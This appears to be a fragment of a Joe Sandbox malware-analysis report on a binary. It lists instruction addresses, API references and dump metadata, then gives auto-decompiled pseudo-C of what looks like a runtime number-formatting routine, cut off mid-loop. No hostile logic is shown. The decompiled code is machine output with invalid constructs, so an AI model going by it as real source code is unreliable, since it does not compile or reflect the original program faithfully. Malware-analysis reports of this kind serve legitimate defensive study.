0x004228bb
0x004228be
0x004228c4
0x004228c7
0x004228cd
0x004228cd
0x004228cd
0x004228d9
0x004228dc
0x004228e2
0x004228e4
0x00000000
0x00000000
0x004228ea
0x004228ea
0x004228f3
0x004228fa
0x00422904
0x0042290b
0x0042291a
0x00422926
0x00422929
0x0042292f
0x00422936
0x00422941
0x00422941
0x00000000
0x00422941
0x00422938
0x00422938
0x0042293f
0x0042294d
0x0042294d
0x00422954
0x00422958
0x00422966
0x00000000
0x0042296b
0x00000000
0x0042293f
0x00422973
0x00422990
0x00422990
0x00422997
0x0042299c
0x0042299c
0x0042299f
0x004229a1
0x004229a8
0x004229ac
0x004229b5
0x004229ba
0x0042299f
0x00422997
0x004229bd
0x004229bd
0x004229c1
0x004229c9
0x004229d1
0x004229d1
0x004229d8
0x004229d8
0x00421aaf
0x00421ab5
0x00421ac2
0x00421ac7
0x00000000
0x00421ada
0x00421ae4
0x00421b0b
0x00421af2
0x00421b03
0x00421b03
0x00421ae4
0x00421b15
0x00421b1b
0x00421b27
0x00421b2a
0x00421b38
0x00421b3b
0x00421b48
0x00421bed
0x00421bf3
0x00421bf9
0x00421c00
0x00000000
0x00000000
0x00421c06
0x00421c0c
0x00000000
0x00421c13
0x00421c13
0x00421c2b
0x00421c30
0x00421c33
0x00421c35
0x00421cef
0x00421d02
0x00421d07
0x00000000
0x00421c3b
0x00421c4e
0x00421c53
0x00421c59
0x00421c5b
0x00421c64
0x00421c64
0x00421c67
0x00421c73
0x00421c77
0x00421c7d
0x00421c7f
0x00421c84
0x00421c86
0x00421c8b
0x00421c90
0x00421c92
0x00421c97
0x00421c9a
0x00421c9d
0x00421c9f
0x00421c9f
0x00421c9d
0x00421ca0
0x00421ca0
0x00421ca7
0x00000000
0x00421ca9
0x00421cae
0x00421cca
0x00421cd2
0x00421cdf
0x00421ce4
0x00000000
0x00421ce4
0x00421ca7
0x00000000
0x00421d0f
0x00421d0f
0x00421d16
0x00421d19
0x00421d1c
0x00421d1f
0x00421d22
0x00421d25
0x00421d28
0x00421d2f
0x00421d36
0x00000000
0x00000000
0x00421d42
0x00421d42
0x00421d49
0x00421d55
0x00421d58
0x00421d5e
0x00421d65
0x00000000
0x00000000
0x00421d67
0x00421d67
0x00421d6d
0x00421d6d
0x00421d74
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00421db7
0x00421db7
0x00421dbe
0x00421dc1
0x00421deb
0x00421dee
0x00421dee
0x00421df1
0x00421df8
0x00421df8
0x00421dfc
0x00421dc3
0x00421dc3
0x00421dcf
0x00421dd2
0x00421dd6
0x00421dd8
0x00421ddb
0x00421ddb
0x00421dde
0x00421de4
0x00421de6
0x00421de6
0x00421de9
0x00000000
0x00000000
0x00421e04
0x00421e04
0x00000000
0x00000000
0x00421e10
0x00421e10
0x00421e17
0x00421e1a
0x00421e3a
0x00421e3d
0x00421e3d
0x00421e47
0x00421e47
0x00421e4b
0x00421e1c
0x00421e1c
0x00421e28
0x00421e2b
0x00421e2f
0x00421e31
0x00421e31
0x00421e38
0x00000000
0x00000000
0x00421e53
0x00421e53
0x00421e5a
0x00421e66
0x00421e69
0x00421e6f
0x00421e76
0x00421f89
0x00000000
0x00421f89
0x00421e7c
0x00421e7c
0x00421e82
0x00421e82
0x00421e89
0x00000000
0x00421ebf
0x00421ebf
0x00421ec2
0x00421ec5
0x00421ec8
0x00421ef0
0x00421ef0
0x00421ef3
0x00421ef6
0x00421ef9
0x00421f1e
0x00421f1e
0x00421f21
0x00421f24
0x00421f27
0x00421f60
0x00421f71
0x00000000
0x00421f71
0x00421f29
0x00421f29
0x00421f2c
0x00421f2f
0x00421f32
0x00000000
0x00000000
0x00421f34
0x00421f34
0x00421f37
0x00421f3a
0x00421f3d
0x00000000
0x00000000
0x00421f3f
0x00421f3f
0x00421f42
0x00421f45
0x00421f48
0x00000000
0x00000000
0x00421f4a
0x00421f4a
0x00421f4d
0x00421f50
0x00421f53
0x00000000
0x00000000
0x00421f55
0x00421f55
0x00421f58
0x00421f5b
0x00421f5e
0x00421f62
0x00000000
0x00421f62
0x00000000
0x00421f5e
0x00421efb
0x00421efb
0x00421efe
0x00421f02
0x00421f05
0x00000000
0x00421f07
0x00421f0a
0x00421f0d
0x00421f10
0x00421f13
0x00421f19
0x00000000
0x00421f19
0x00421f05
0x00421eca
0x00421eca
0x00421ecd
0x00421ed1
0x00421ed4
0x00000000
0x00421ed6
0x00421ed9
0x00421edc
0x00421edf
0x00421ee2
0x00421ee8
0x00000000
0x00421ee8
0x00000000
0x00421f73
0x00421f76
0x00421f79
0x00000000
0x00000000
0x00421e90
0x00421e90
0x00421e93
0x00421e96
0x00421e99
0x00421eb1
0x00421eb4
0x00421eb4
0x00421eb7
0x00421e9b
0x00421e9e
0x00421ea1
0x00421ea7
0x00421eac
0x00421eac
0x00000000
0x00000000
0x00421f7e
0x00421f7e
0x00421f81
0x00421f81
0x00421f86
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00421f8e
0x00421f8e
0x00421f95
0x00421fa1
0x00421fa4
0x00421faa
0x00421fb1
0x004227d2
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x004227d2
0x00421fb7
0x00421fbd
0x00421fbd
0x00421fc4
0x00000000
0x0042231e
0x0042231e
0x00422325
0x0042232c
0x0042232c
0x0042232f
0x00000000
0x00000000
0x00421fcb
0x00421fce
0x00421fce
0x00421fd4
0x00421fd6
0x00421fd9
0x00421fd9
0x00421fde
0x00421fde
0x00000000
0x00000000
0x0042210b
0x0042210e
0x0042210e
0x00422113
0x00422115
0x00422118
0x00422118
0x0042211e
0x0042211e
0x00000000
0x00000000
0x004224eb
0x004224eb
0x00000000
0x00000000
0x00422075
0x00422075
0x00422081
0x00422087
0x0042208e
0x0042209c
0x0042209c
0x004220a2
0x004220a5
0x004220b1
0x00422106
0x00000000
0x00422106
0x00422090
0x00422090
0x00422096
0x0042209a
0x004220b6
0x004220b9
0x004220b9
0x004220bf
0x004220e7
0x004220ee
0x004220f4
0x004220f7
0x004220fa
0x00422100
0x00422103
0x004220c1
0x004220c1
0x004220c7
0x004220ca
0x004220cd
0x004220d3
0x004220d6
0x004220d9
0x004220db
0x004220de
0x004220de
0x00000000
0x004220bf
0x00000000
0x00000000
0x00422335
0x00422338
0x0042233b
0x0042233e
0x00422344
0x00422347
0x0042234e
0x00422352
0x0042235d
0x0042235d
0x00422361
0x00422378
0x00422378
0x0042237f
0x00422381
0x00422381
0x00422388
0x00422388
0x0042238f
0x004223a0
0x004223af
0x004223b2
0x004223b6
0x004223cc
0x004223b8
0x004223b8
0x004223bb
0x004223c1
0x004223c7
0x004223c7
0x004223b6
0x004223d6
0x004223d9
0x004223dc
0x004223df
0x004223e2
0x004223e5
0x004223eb
0x004223f1
0x004223f9
0x004223fa
0x004223fd
0x004223fe
0x00422401
0x00422402
0x00422409
0x0042240a
0x0042240d
0x0042240e
0x00422411
0x00422412
0x00422418
0x00422419
0x00422427
0x00422429
0x0042242f
0x0042242f
0x00422435
0x00422437
0x0042243b
0x0042243d
0x00422445
0x00422446
0x00422449
0x0042244a
0x00422458
0x0042245a
0x0042245a
0x0042243b
0x0042245d
0x00422464
0x00422467
0x0042246c
0x0042246c
0x00422472
0x00422474
0x0042247c
0x0042247d
0x00422480
0x00422481
0x00422490
0x00422492
0x00422492
0x00422472
0x00422495
0x00422498
0x0042249b
0x0042249e
0x004224a3
0x004224a9
0x004224ac
0x004224af
0x004224af
0x004224b2
0x004224b2
0x004224b5
0x004224c1
0x004227d2
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x00000000
0x004227d2
0x00422363
0x00422363
0x0042236a
0x0042236d
0x00000000
0x00000000
0x0042236f
0x0042236f
0x00000000
0x0042236f
0x00422354
0x00422354
0x00000000
0x00000000
0x00421fe1
0x00421fe4
0x00421fe4
0x00421fea
0x00422045
0x0042204d
0x00422054
0x0042205a
0x00422060
0x00421fec
0x00421fec
0x00421ff6
0x00421ffa
0x00422002
0x00422009
0x00422016
0x0042201d
0x00422029
0x0042202f
0x00422036
0x00422038
0x00422038
0x0042203f
0x00422067
0x0042206d
0x004227d2
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x00000000
0x004224c9
0x004224cc
0x004224cf
0x004224d2
0x00000000
0x00000000
0x00422227
0x00422227
0x00422233
0x00422239
0x0042223e
0x00422240
0x004222ea
0x004222ed
0x004222ed
0x004222f0
0x00422304
0x0042230a
0x00422310
0x004222f2
0x004222f2
0x004222ff
0x004222ff
0x00422312
0x004227d2
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x004227d2
0x00422246
0x00422246
0x00422246
0x00422248
0x00422256
0x0042224a
0x0042224a
0x0042224a
0x00422260
0x00422266
0x0042226c
0x00422273
0x00422275
0x0042227a
0x0042227c
0x00422281
0x00422286
0x00422288
0x0042228d
0x00422290
0x00422293
0x00422295
0x00422295
0x00422293
0x00422296
0x0042229d
0x004222e5
0x004227d2
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x0042229f
0x0042229f
0x004222a4
0x004222c0
0x004222c8
0x004222d2
0x004222d5
0x004222da
0x00000000
0x004222da
0x00000000
0x0042252c
0x0042252c
0x00422536
0x00422536
0x0042253c
0x0042253e
0x00422541
0x00422541
0x00422547
0x00422547
0x0042254a
0x0042254d
0x0042254d
0x00422552
0x00422574
0x00422574
0x0042257a
0x0042259c
0x0042259c
0x0042259f
0x004225e6
0x004225e6
0x004225e9
0x00422606
0x0042260a
0x00422612
0x00422612
0x00422614
0x0042261a
0x004225eb
0x004225eb
0x004225ef
0x004225f7
0x004225f8
0x004225fe
0x004225fe
0x004225a1
0x004225a4
0x004225a4
0x004225a7
0x004225c5
0x004225d1
0x004225d4
0x004225d5
0x004225db
0x004225a9
0x004225a9
0x004225ad
0x004225b5
0x004225b6
0x004225b7
0x004225bd
0x004225bd
0x004225e1
0x0042257c
0x0042257c
0x00422588
0x0042258e
0x0042258e
0x00422554
0x00422554
0x00422560
0x00422566
0x00422566
0x00422623
0x00422623
0x00422626
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00422121
0x00422121
0x00422125
0x00422133
0x00422136
0x00422127
0x00422127
0x00422127
0x0042213c
0x00422142
0x00422148
0x00422154
0x0042215a
0x0042215a
0x00422160
0x004221c7
0x004221c7
0x004221cb
0x004221cd
0x004221d3
0x004221d3
0x004221d6
0x004221d9
0x004221df
0x004221df
0x004221df
0x004221eb
0x004221ee
0x004221f4
0x004221f6
0x00000000
0x00000000
0x004221f8
0x004221f8
0x004221fe
0x00422201
0x00422203
0x00000000
0x00000000
0x00422205
0x0042220b
0x0042220e
0x0042220e
0x00422216
0x00422216
0x0042221c
0x0042221c
0x0042221f
0x00000000
0x00422162
0x00422162
0x00422162
0x00422166
0x00422168
0x0042216d
0x0042216d
0x00422170
0x00422177
0x0042217a
0x00422180
0x00422180
0x00422180
0x0042218c
0x0042218f
0x00422195
0x00422197
0x00000000
0x00000000
0x00422199
0x00422199
0x0042219f
0x004221a2
0x004221a4
0x00000000
0x00000000
0x004221a6
0x004221ac
0x004221af
0x004221af
0x004221b7
0x004221bd
0x004221c0
0x004221c2
0x00422222
0x004227d2
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x004227d2
0x00000000
0x004224db
0x004224db
0x0042254a
0x0042254a
0x0042254d
0x0042254d
0x00422552
0x00422574
0x00422574
0x0042257a
0x0042259c
0x0042259c
0x0042259f
0x004225e6
0x004225e6
0x004225e9
0x00422606
0x0042260a
0x00422612
0x00422612
0x00422614
0x0042261a
0x004225eb
0x004225eb
0x004225ef
0x004225f7
0x004225f8
0x004225fe
0x004225fe
0x004225a1
0x004225a4
0x004225a4
0x004225a7
0x004225c5
0x004225d1
0x004225d4
0x004225d5
0x004225db
0x004225a9
0x004225a9
0x004225ad
0x004225b5
0x004225b6
0x004225b7
0x004225bd
0x004225bd
0x004225e1
0x0042257c
0x0042257c
0x00422588
0x0042258e
0x0042258e
0x00422554
0x00422554
0x00422560
0x00422566
0x00422566
0x00422623
0x00422623
0x00422626
0x00000000
0x00000000
0x00000000
0x00422626
0x00000000
0x004224f7
0x004224f7
0x00422501
0x00422501
0x0042250b
0x0042250b
0x00422511
0x00422513
0x0042251d
0x0042251d
0x00422520
0x00422523
0x00422523
0x0042254a
0x0042254a
0x0042254d
0x0042254d
0x00422552
0x00422574
0x00422574
0x0042257a
0x0042259c
0x0042259c
0x0042259f
0x004225e6
0x004225e6
0x004225e9
0x00422606
0x0042260a
0x00422612
0x00422612
0x00422614
0x0042261a
0x004225eb
0x004225eb
0x004225ef
0x004225f7
0x004225f8
0x004225fe
0x004225fe
0x004225a1
0x004225a4
0x004225a4
0x004225a7
0x004225c5
0x004225d1
0x004225d4
0x004225d5
0x004225db
0x004225a9
0x004225a9
0x004225ad
0x004225b5
0x004225b6
0x004225b7
0x004225bd
0x004225bd
0x004225e1
0x0042257c
0x0042257c
0x00422588
0x0042258e
0x0042258e
0x00422554
0x00422554
0x00422560
0x00422566
0x00422566
0x00422623
0x00422623
0x00422626
0x00000000
0x00000000
0x00000000
0x00422626
0x00000000
0x004227d2
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x00000000
0x00000000
0x00421d91
0x00421d94
0x00421d97
0x00000000
0x00000000
0x00421d9c
0x00421d9f
0x00421da4
0x00000000
0x00000000
0x00421d86
0x00421d86
0x00421d89
0x00421d8c
0x00000000
0x00000000
0x00421d7b
0x00421d7e
0x00421d81
0x00000000
0x00000000
0x00421da9
0x00421da9
0x00421dac
0x00421dac
0x00421daf
0x00000000
0x00000000
0x00421db2
0x00000000
0x00000000
0x00421b4e
0x00421b50
0x00421b5e
0x00421b52
0x00421b52
0x00421b52
0x00421b68
0x00421b6e
0x00421b7b
0x00421b7d
0x00421b82
0x00421b84
0x00421b89
0x00421b8e
0x00421b90
0x00421b95
0x00421b9b
0x00421b9d
0x00421b9d
0x00421b9b
0x00421b9e
0x00421ba5
0x00000000
0x00421ba7
0x00421bac
0x00421bc8
0x00421bd0
0x00421bdd
0x00421be2
0x00422aa1
0x00422aae
0x00422aae
0x00421ba5
0x00421b48
0x004229dd
0x004229dd
0x004229e4
0x004229fb
0x004229fb
0x00422a05
0x00422a05
0x00422a0b
0x00422a11
0x00422a18
0x00422a1a
0x00422a1f
0x00422a21
0x00422a26
0x00422a2b
0x00422a2d
0x00422a32
0x00422a35
0x00422a38
0x00422a3a
0x00422a3a
0x00422a38
0x00422a3b
0x00422a42
0x00422a8d
0x00422a96
0x00422a9b
0x00422a44
0x00422a49
0x00422a65
0x00422a6d
0x00422a7a
0x00422a7f
0x00422a7f
0x00000000
0x00422a42
0x004229e6
0x004229e6
0x004229ed
0x00000000
0x00000000
0x004229ef
0x004229ef
0x00000000
0x004229ef
0x004227d2
0x004227a9
0x004227a9
0x004227ad
0x004227ba
0x004227bd
0x004227c0
0x004227c3
0x004227c6
0x004227c9
0x004227cc
0x004227cc
0x004227cf
0x00000000
0x004227cf
0x004227af
0x004227af
0x004227b2
0x004227b5
0x004227b8
0x00000000
0x00000000
0x00000000
0x004227b8
0x00422711
0x00422711
0x00422714
0x00422717
0x0042271e
0x00422725
0x0042272d
0x00422733
0x00422736
0x00422739
0x00422740
0x0042274c
0x00422752
0x00422758
0x0042275f
0x00422761
0x00422767
0x00422767
0x0042276d
0x0042276d
0x00422773
0x00422776
0x0042277c
0x00422781
0x00422784
0x004226f3
0x004226f3
0x004226f9
0x004226fc
0x004226ff
0x00422701
0x00000000
0x00000000
0x00000000
0x00422701
0x004226f3
0x00422633
0x00422633
0x0042263a
0x00000000
0x00000000
0x00000000
0x00422668
0x00422668
0x0042266e
0x00422674
0x0042267a
0x00000000
0x0042267a
0x0042254a
0x00422501
0x004224eb

APIs

_get_int64_arg.LIBCMTD ref: 00422558
__aullrem.LIBCMT ref: 00422725
__aulldiv.LIBCMT ref: 00422747

Strings

9, xrefs: 00422758
0, xrefs: 00422513

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 0$9
API String ID: 3120068967-1975997740
Opcode ID: 2f0ae48c9464669da93a17cc9cd30ed864345a9dd1054127a30626fbfc5cfff4
Instruction ID: f5857a4250ea15657accdb0e406c027eeb664bb3983539fa242409c1c1d63bec
Opcode Fuzzy Hash: 2f0ae48c9464669da93a17cc9cd30ed864345a9dd1054127a30626fbfc5cfff4
Instruction Fuzzy Hash: CA411671E06228EFDB24CF58D999BAEB7B5BB44300F5081DAE408A7340C7789E85CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00423869 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00423869() {
				signed int _t483;
				void* _t488;
				signed int _t490;
				void* _t498;
				intOrPtr _t501;
				signed int _t519;
				intOrPtr _t523;
				intOrPtr _t524;
				signed int _t525;
				void* _t527;

				L0:
				while(1) {
					L0:
					 *((intOrPtr*)(_t525 - 0x460)) = 0x27;
					while(1) {
						L145:
						 *(__ebp - 8) = 0x10;
						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
						__eflags =  *(__ebp - 0x10) & 0x00000080;
						if(( *(__ebp - 0x10) & 0x00000080) != 0) {
							__edx = 0x30;
							 *(__ebp - 0x14) = __dx;
							 *(__ebp - 0x460) =  *(__ebp - 0x460) + 0x51;
							__eflags =  *(__ebp - 0x460) + 0x51;
							 *(__ebp - 0x12) = __ax;
							 *(__ebp - 0x1c) = 2;
						}
						while(1) {
							L150:
							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
							__eflags =  *(__ebp - 0x10) & 0x00008000;
							if(( *(__ebp - 0x10) & 0x00008000) == 0) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
								__eflags =  *(__ebp - 0x10) & 0x00001000;
								if(( *(__ebp - 0x10) & 0x00001000) == 0) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
									__eflags =  *(__ebp - 0x10) & 0x00000020;
									if(( *(__ebp - 0x10) & 0x00000020) == 0) {
										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
										__eflags =  *(__ebp - 0x10) & 0x00000040;
										if(( *(__ebp - 0x10) & 0x00000040) == 0) {
											__ecx = __ebp + 0x14;
											__eax = E0041F270(__ebp + 0x14);
											__edx = 0;
											__eflags = 0;
											 *(__ebp - 0x4a0) = __eax;
											 *(__ebp - 0x49c) = 0;
										} else {
											__eax = __ebp + 0x14;
											__eax = E0041F270(__ebp + 0x14);
											asm("cdq");
											 *(__ebp - 0x4a0) = __eax;
											 *(__ebp - 0x49c) = __edx;
										}
									} else {
										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
										__eflags =  *(__ebp - 0x10) & 0x00000040;
										if(( *(__ebp - 0x10) & 0x00000040) == 0) {
											__ecx = __ebp + 0x14;
											E0041F270(__ebp + 0x14) = __ax & 0x0000ffff;
											asm("cdq");
											 *(__ebp - 0x4a0) = __ax & 0x0000ffff;
											 *(__ebp - 0x49c) = __edx;
										} else {
											__eax = __ebp + 0x14;
											__eax = E0041F270(__ebp + 0x14);
											__ax = __eax;
											asm("cdq");
											 *(__ebp - 0x4a0) = __eax;
											 *(__ebp - 0x49c) = __edx;
										}
									}
								} else {
									__eax = __ebp + 0x14;
									 *(__ebp - 0x4a0) = E0041F290(__ebp + 0x14);
									 *(__ebp - 0x49c) = __edx;
								}
							} else {
								__ecx = __ebp + 0x14;
								 *(__ebp - 0x4a0) = E0041F290(__ebp + 0x14);
								 *(__ebp - 0x49c) = __edx;
							}
							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
							__eflags =  *(__ebp - 0x10) & 0x00000040;
							if(( *(__ebp - 0x10) & 0x00000040) == 0) {
								goto L167;
							}
							L163:
							__eflags =  *(__ebp - 0x49c);
							if(__eflags > 0) {
								goto L167;
							}
							L164:
							if(__eflags < 0) {
								L166:
								 *(__ebp - 0x4a0) =  ~( *(__ebp - 0x4a0));
								__edx =  *(__ebp - 0x49c);
								asm("adc edx, 0x0");
								__edx =  ~( *(__ebp - 0x49c));
								 *(__ebp - 0x4a8) =  ~( *(__ebp - 0x4a0));
								 *(__ebp - 0x4a4) =  ~( *(__ebp - 0x49c));
								 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
								L168:
								 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
								__eflags =  *(__ebp - 0x10) & 0x00008000;
								if(( *(__ebp - 0x10) & 0x00008000) == 0) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
									__eflags =  *(__ebp - 0x10) & 0x00001000;
									if(( *(__ebp - 0x10) & 0x00001000) == 0) {
										__edx =  *(__ebp - 0x4a8);
										__eax =  *(__ebp - 0x4a4);
										__eax =  *(__ebp - 0x4a4) & 0x00000000;
										__eflags = __eax;
										 *(__ebp - 0x4a4) = __eax;
									}
								}
								__eflags =  *(__ebp - 0x30);
								if( *(__ebp - 0x30) >= 0) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
									__eflags =  *(__ebp - 0x30) - 0x200;
									if( *(__ebp - 0x30) > 0x200) {
										 *(__ebp - 0x30) = 0x200;
									}
								} else {
									 *(__ebp - 0x30) = 1;
								}
								 *(__ebp - 0x4a8) =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
								__eflags =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
								if(( *(__ebp - 0x4a8) |  *(__ebp - 0x4a4)) == 0) {
									 *(__ebp - 0x1c) = 0;
								}
								__eax = __ebp - 0x249;
								 *(__ebp - 4) = __ebp - 0x249;
								while(1) {
									L178:
									__ecx =  *(__ebp - 0x30);
									 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
									 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
									__eflags =  *(__ebp - 0x30);
									if( *(__ebp - 0x30) > 0) {
										goto L180;
									}
									L179:
									 *(__ebp - 0x4a8) =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
									__eflags =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
									if(( *(__ebp - 0x4a8) |  *(__ebp - 0x4a4)) == 0) {
										L183:
										__ebp - 0x249 = __ebp - 0x249 -  *(__ebp - 4);
										 *(__ebp - 0x24) = __ebp - 0x249 -  *(__ebp - 4);
										__ecx =  *(__ebp - 4);
										__ecx =  *(__ebp - 4) + 1;
										 *(__ebp - 4) = __ecx;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000200;
										__eflags =  *(__ebp - 0x10) & 0x00000200;
										if(( *(__ebp - 0x10) & 0x00000200) == 0) {
											while(1) {
												L187:
												__eflags =  *(__ebp - 0x28);
												if( *(__ebp - 0x28) != 0) {
													goto L212;
												}
												L188:
												 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
												__eflags =  *(__ebp - 0x10) & 0x00000040;
												if(( *(__ebp - 0x10) & 0x00000040) != 0) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000100;
													__eflags =  *(__ebp - 0x10) & 0x00000100;
													if(( *(__ebp - 0x10) & 0x00000100) == 0) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000001;
														__eflags =  *(__ebp - 0x10) & 0x00000001;
														if(( *(__ebp - 0x10) & 0x00000001) == 0) {
															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000002;
															__eflags =  *(__ebp - 0x10) & 0x00000002;
															if(( *(__ebp - 0x10) & 0x00000002) != 0) {
																__edx = 0x20;
																 *(__ebp - 0x14) = __dx;
																 *(__ebp - 0x1c) = 1;
															}
														} else {
															__eax = 0x2b;
															 *(__ebp - 0x14) = __ax;
															 *(__ebp - 0x1c) = 1;
														}
													} else {
														__ecx = 0x2d;
														 *(__ebp - 0x14) = __cx;
														 *(__ebp - 0x1c) = 1;
													}
												}
												 *(__ebp - 0x18) =  *(__ebp - 0x18) -  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x18) -  *(__ebp - 0x24) -  *(__ebp - 0x1c);
												 *(__ebp - 0x4ac) =  *(__ebp - 0x18) -  *(__ebp - 0x24) -  *(__ebp - 0x1c);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x0000000c;
												__eflags =  *(__ebp - 0x10) & 0x0000000c;
												if(( *(__ebp - 0x10) & 0x0000000c) == 0) {
													__edx = __ebp - 0x44c;
													__eax =  *(__ebp + 8);
													__ecx =  *(__ebp - 0x4ac);
													__eax = E00423F90(0x20,  *(__ebp - 0x4ac),  *(__ebp + 8), __ebp - 0x44c);
												}
												__edx = __ebp - 0x44c;
												__eax =  *(__ebp + 8);
												__ecx =  *(__ebp - 0x1c);
												__edx = __ebp - 0x14;
												E00423FD0( *(__ebp - 0x1c), __ebp - 0x14,  *(__ebp - 0x1c),  *(__ebp + 8), __ebp - 0x44c) =  *(__ebp - 0x10);
												__eax =  *(__ebp - 0x10) & 0x00000008;
												__eflags =  *(__ebp - 0x10) & 0x00000008;
												if(( *(__ebp - 0x10) & 0x00000008) != 0) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000004;
													__eflags =  *(__ebp - 0x10) & 0x00000004;
													if(( *(__ebp - 0x10) & 0x00000004) == 0) {
														__edx = __ebp - 0x44c;
														__eax =  *(__ebp + 8);
														__ecx =  *(__ebp - 0x4ac);
														__eax = E00423F90(0x30,  *(__ebp - 0x4ac),  *(__ebp + 8), __ebp - 0x44c);
													}
												}
												__eflags =  *(__ebp - 0xc);
												if( *(__ebp - 0xc) != 0) {
													L208:
													__edx = __ebp - 0x44c;
													__eax =  *(__ebp + 8);
													__ecx =  *(__ebp - 0x24);
													__edx =  *(__ebp - 4);
													__eax = E00423FD0(__ecx,  *(__ebp - 4), __ecx,  *(__ebp + 8), __ebp - 0x44c);
													goto L209;
												} else {
													L201:
													__eflags =  *(__ebp - 0x24);
													if( *(__ebp - 0x24) <= 0) {
														goto L208;
													}
													L202:
													__edx =  *(__ebp - 4);
													 *(__ebp - 0x4b0) =  *(__ebp - 4);
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x4b4) =  *(__ebp - 0x24);
													while(1) {
														L203:
														__ecx =  *(__ebp - 0x4b4);
														 *(__ebp - 0x4b4) =  *(__ebp - 0x4b4) - 1;
														 *(__ebp - 0x4b4) =  *(__ebp - 0x4b4) - 1;
														__eflags = __ecx;
														if(__ecx <= 0) {
															break;
														}
														L204:
														__ecx = __ebp - 0x40;
														__eax = E004103A0(__ebp - 0x40);
														__ecx = __ebp - 0x40;
														E004103A0(__ebp - 0x40) =  *__eax;
														__ecx =  *(__ebp - 0x458 + 0xac);
														__edx =  *(__ebp - 0x4b0);
														__eax = __ebp - 0x458;
														 *(__ebp - 0x4b8) = E00420B60(__ebp - 0x458,  *(__ebp - 0x4b0),  *(__ebp - 0x458 + 0xac), __ebp - 0x458);
														__eflags =  *(__ebp - 0x4b8);
														if( *(__ebp - 0x4b8) > 0) {
															L206:
															__ecx = __ebp - 0x44c;
															__edx =  *(__ebp + 8);
															 *(__ebp - 0x458) & 0x0000ffff = E00423F30( *(__ebp - 0x458) & 0x0000ffff,  *(__ebp + 8), __ebp - 0x44c);
															 *(__ebp - 0x4b0) =  *(__ebp - 0x4b0) +  *(__ebp - 0x4b8);
															 *(__ebp - 0x4b0) =  *(__ebp - 0x4b0) +  *(__ebp - 0x4b8);
															continue;
														}
														L205:
														 *(__ebp - 0x44c) = 0xffffffff;
														break;
													}
													L207:
													L209:
													__eflags =  *(__ebp - 0x44c);
													if( *(__ebp - 0x44c) >= 0) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000004;
														__eflags =  *(__ebp - 0x10) & 0x00000004;
														if(( *(__ebp - 0x10) & 0x00000004) != 0) {
															__ecx = __ebp - 0x44c;
															__edx =  *(__ebp + 8);
															 *(__ebp - 0x4ac) = E00423F90(0x20,  *(__ebp - 0x4ac),  *(__ebp + 8), __ebp - 0x44c);
														}
													}
												}
												L212:
												__eflags =  *(__ebp - 0x20);
												if( *(__ebp - 0x20) != 0) {
													__ecx =  *(__ebp - 0x20);
													__eax = L0040F230( *(__ebp - 0x20), 2);
													 *(__ebp - 0x20) = 0;
												}
												while(1) {
													L214:
													 *(_t525 - 0x454) =  *((intOrPtr*)( *((intOrPtr*)(_t525 + 0xc))));
